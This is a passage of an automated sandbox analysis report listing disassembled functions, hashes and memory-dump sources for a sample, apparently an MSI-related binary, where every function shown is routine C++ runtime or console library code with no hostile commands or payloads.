Instruction ID: a7ad7d262e15ffd79519e65c132ce4f1c32663d74ecedd2ac8d600a87f012acf
Opcode Fuzzy Hash: b3fc3b54b99106e948984381f2797ab13db9db9d529d9f59925482a310d76121
Instruction Fuzzy Hash: 8F01C072900219DBCB05EBA4D841BBE7765BF84720F24050EEA15AB3D2CF309E01DBA2

Function 00CBD752 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CBD759
std::_Lockit::_Lockit.LIBCPMT ref: 00CBD763

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CBD7B4
std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD7D4

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 55c13f41397d3ada78b1022ebac6bc2c7f5a099b2c26b365ac5c8bf9a302843e
Instruction ID: 5cd3b411d202ae1a94583d3394c87bb0060b8049988279b7bbb622a6c50c28e8
Opcode Fuzzy Hash: 55c13f41397d3ada78b1022ebac6bc2c7f5a099b2c26b365ac5c8bf9a302843e
Instruction Fuzzy Hash: EE01D276900229DFCB05EFA4C841BFE77A5AF80310F24050AF916AB392DF709E01D7A2

Function 00CC270D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2714
std::_Lockit::_Lockit.LIBCPMT ref: 00CC271E

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC276F
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC278F

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 9c1bb983687424e23239a1eee1470e417b289bd0a5f12b061caa9d0e2ff80e9a
Instruction ID: c4fbd903b4fcf452d8f846c982403c686cb6b314915931e7de37c331e9cb12fb
Opcode Fuzzy Hash: 9c1bb983687424e23239a1eee1470e417b289bd0a5f12b061caa9d0e2ff80e9a
Instruction Fuzzy Hash: 03018075900219DBCB09EBA4D845BBE7775BF84710F24050EE514AB392CF709E05DBA2

Function 00CC28CC Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC28D3
std::_Lockit::_Lockit.LIBCPMT ref: 00CC28DD

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC292E
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC294E

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 03761820902e36419a7453dac93aeaa1ca211aa35901dbe83c3fb27debd0da50
Instruction ID: 863e872e9380fa57702f4bfab3053c40d987914c422412aee339aacdd76d7c1d
Opcode Fuzzy Hash: 03761820902e36419a7453dac93aeaa1ca211aa35901dbe83c3fb27debd0da50
Instruction Fuzzy Hash: 4B01D271900219DBCB05EBA0D851FBE77B5AF84720F24050EF615AB392CF709E01DBA2

Function 00CC2837 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC283E
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2848

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC2899
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC28B9

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 0f9a35dce76cfe054766802da1be831b2e8340bf89e4d8ba6439f45c610a53bb
Instruction ID: 825c51cc7d03ce38479a1c56d3fe1908e255d996a1f04ae01aa0c6d751141063
Opcode Fuzzy Hash: 0f9a35dce76cfe054766802da1be831b2e8340bf89e4d8ba6439f45c610a53bb
Instruction Fuzzy Hash: 13016D72900229DBCB15EBA4D841BBE77A5BF84720F24050EE515AB3D2DF709A05DBA2

Function 00CCE96D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCE974
std::_Lockit::_Lockit.LIBCPMT ref: 00CCE97E

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CCE9CF
std::_Lockit::~_Lockit.LIBCPMT ref: 00CCE9EF

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 83adb260b7544a2f0c034ac35b02a9732cec86fb7e646741128b88c463085378
Instruction ID: 7914e6b05fcc3af7d53cec6ffb5ccfd002c82284de4efaa2e9bd5e64e39bd10b
Opcode Fuzzy Hash: 83adb260b7544a2f0c034ac35b02a9732cec86fb7e646741128b88c463085378
Instruction Fuzzy Hash: 34018071900219DBCB15EBA4D941BFE77A5AF85710F25050EF614AB392CF709E01EBA2

Function 00CCEA02 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCEA09
std::_Lockit::_Lockit.LIBCPMT ref: 00CCEA13

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CCEA64
std::_Lockit::~_Lockit.LIBCPMT ref: 00CCEA84

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 45d7f8a563a9a58444837f33fe59dd51fcfd75c7018e87e941e3a2f64939c244
Instruction ID: 62334fd055d142ace5ef857b030b82b7da7c6ef4463ae9a5f42ece2430bdae19
Opcode Fuzzy Hash: 45d7f8a563a9a58444837f33fe59dd51fcfd75c7018e87e941e3a2f64939c244
Instruction Fuzzy Hash: CE01D232900219DFCB15EBA4D841BBE7B65BF85720F25050EF510AB392CF709E01EBA2

Function 00CCEBC1 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCEBC8
std::_Lockit::_Lockit.LIBCPMT ref: 00CCEBD2

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CCEC23
std::_Lockit::~_Lockit.LIBCPMT ref: 00CCEC43

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 51b21ece54dcff490e1599671a698982d811382b80fa5d09d753293f520a7d31
Instruction ID: e18892ff69b681dacd70acdbc95d53be47f537ca9f918a26758720715c084e3f
Opcode Fuzzy Hash: 51b21ece54dcff490e1599671a698982d811382b80fa5d09d753293f520a7d31
Instruction Fuzzy Hash: B301C031900219DBCB15EBA4D806BBE77B5AF80710F24044EE615AB3D2CF709E01DBA2

Function 00CC2BB5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2BBC
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2BC6

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC2C17
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2C37

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: b1e15c87b5ae75f6a1de65780bc8f1bb38a96f63e0f00942c65a07365132437d
Instruction ID: 61850a0c1add902963e96312e0315b5f1a2de6f58cf1933f9632ae84893df69a
Opcode Fuzzy Hash: b1e15c87b5ae75f6a1de65780bc8f1bb38a96f63e0f00942c65a07365132437d
Instruction Fuzzy Hash: 6801C035900259DBCB19EBA4E801BBE77B5BF84310F24440EE510AB392CF749E00DBA2

Function 00CC2CDF Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2CE6
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2CF0

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC2D41
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2D61

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: fe68a8146132c594d2bf4718a257cf7ef1e5ea4daa82c38b07caeda3baac3778
Instruction ID: f716e0f0f1a009c587f8a407f1d46f1685129b5c31864927cf652f6f668dc248
Opcode Fuzzy Hash: fe68a8146132c594d2bf4718a257cf7ef1e5ea4daa82c38b07caeda3baac3778
Instruction Fuzzy Hash: 3E01C071900219DFCB19EBA0D841BBE7765BF94710F24050EE615AB392CF709E01DBA2

Function 00CC2C4A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2C51
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2C5B

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC2CAC
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2CCC

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 085f40b022aadc5ca0d4b275d48fa592e4f35b285ee4751266479f65a734c965
Instruction ID: 54e03adc9611994838c51f9b131a9df10292bedf96d739acc7fe188ea7840b12
Opcode Fuzzy Hash: 085f40b022aadc5ca0d4b275d48fa592e4f35b285ee4751266479f65a734c965
Instruction Fuzzy Hash: B301CC75901219DBCB19EBA4D841BBE77A5AF80710F24040EF611AB392CF709E00EBA2

Function 00CCEC56 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCEC5D
std::_Lockit::_Lockit.LIBCPMT ref: 00CCEC67

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CCECB8
std::_Lockit::~_Lockit.LIBCPMT ref: 00CCECD8

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: e39197794eab7e44910e16a244630e71c80050f420ae6ad97cbe4ba09a435aba
Instruction ID: c3bcc9379acf529448c8969251c51c91f60db84a67d5a183a95fb28eaab1e539
Opcode Fuzzy Hash: e39197794eab7e44910e16a244630e71c80050f420ae6ad97cbe4ba09a435aba
Instruction Fuzzy Hash: 2201C071900219DBCB05EBA4D841BBE7B65BF80320F24040EF511AB392CF309E01DBA2

Function 00CC2E9E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2EA5
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2EAF

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC2F00
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2F20

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: b06c9e1a301616ab8b6240828cad0708ca730096fe6436163ddbc23562ef8a43
Instruction ID: fba6ae3e3279939d2f1eed42feb48fa482c47933f06593b6f26ef13f9f6ce2d6
Opcode Fuzzy Hash: b06c9e1a301616ab8b6240828cad0708ca730096fe6436163ddbc23562ef8a43
Instruction Fuzzy Hash: 59018075900229DBCB05EBA4D841BBE7775BF84710F24050EF615AB392CF709E05DBA2

Function 00CC2E09 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2E10
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2E1A

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC2E6B
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2E8B

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: d924bd416603d2ec0a11961f34a494e2a59177dd47f89462cfa5458816114bfd
Instruction ID: 4230e213306856c900ce488fdffa03dbc5a077156d5249e633b869f96666d3b5
Opcode Fuzzy Hash: d924bd416603d2ec0a11961f34a494e2a59177dd47f89462cfa5458816114bfd
Instruction Fuzzy Hash: F001C476900219DBCB05EBA4D801BBE7765BF54711F24050EE51467391CF309E04DB91

Function 00CC2F33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2F3A
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2F44

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

std::_Facet_Register.LIBCPMT ref: 00CC2F95
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2FB5

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: a3eb350fbd62387b13383b8f7890a88d2ad366534b1405728d7c8d1b61b6af16
Instruction ID: d2085f7839d8807ef9b54cb7bca4bbe144eff1e86d67900b9eccb5901ea5f8d4
Opcode Fuzzy Hash: a3eb350fbd62387b13383b8f7890a88d2ad366534b1405728d7c8d1b61b6af16
Instruction Fuzzy Hash: 8C01C031900229DBCB15EBA0D801BBEB7B5BF84710F24050EF514AB392CF309E00DBA2

Function 00CF3686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00CF3053,?,00000001,?,?,?,00CF2198,?,?,00000000), ref: 00CF369D
GetLastError.KERNEL32(?,00CF3053,?,00000001,?,?,?,00CF2198,?,?,00000000,?,?,?,00CF271F,?), ref: 00CF36A9

Part of subcall function 00CF366F: CloseHandle.KERNEL32(FFFFFFFE,00CF36B9,?,00CF3053,?,00000001,?,?,?,00CF2198,?,?,00000000,?,?), ref: 00CF367F

___initconout.LIBCMT ref: 00CF36B9

Part of subcall function 00CF3631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CF3660,00CF3040,?,?,00CF2198,?,?,00000000,?), ref: 00CF3644

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00CF3053,?,00000001,?,?,?,00CF2198,?,?,00000000,?), ref: 00CF36CE

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 87e57cb2ccc5a91df423d6c0f2ea7ad6e88241779faab243affaa50db15b4798
Instruction ID: de7ec427d35358740aa3246ead269b8be5058c38aa54ed23b2657d804d3344ba
Opcode Fuzzy Hash: 87e57cb2ccc5a91df423d6c0f2ea7ad6e88241779faab243affaa50db15b4798
Instruction Fuzzy Hash: 40F0C73650415CBBCF525F95DD05BAD3F66FF447A1B054150FF19D5230CA318920EB92

Function 00CD2D20 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00CD2CBD,00000064), ref: 00CD2D43
LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CD2CBD,00000064,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2D4D
WaitForSingleObjectEx.KERNEL32(?,00000000,?,00CD2CBD,00000064,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2D5E
EnterCriticalSection.KERNEL32(00D0DD3C,?,00CD2CBD,00000064,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2D65

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 64c942b2b7354194a43da9277bf64e22ef37da96e93a0d57dabf4abebd4a9c21
Instruction ID: ece742491264bf12e6684c40ac359565677ebbacf68a6069d237094165f28657
Opcode Fuzzy Hash: 64c942b2b7354194a43da9277bf64e22ef37da96e93a0d57dabf4abebd4a9c21
Instruction Fuzzy Hash: 39E01232545724BBDB126B94EC08BEE3F2BAF04B51B000152F60DA6271CA615951DBF6

Function 00CBEC87 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CBEC8E

Part of subcall function 00CBD87C: __EH_prolog3.LIBCMT ref: 00CBD883
Part of subcall function 00CBD87C: std::_Lockit::_Lockit.LIBCPMT ref: 00CBD88D
Part of subcall function 00CBD87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD8FE

_Find_elem.LIBCPMT ref: 00CBEE8A

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00CBECF6

Memory Dump Source

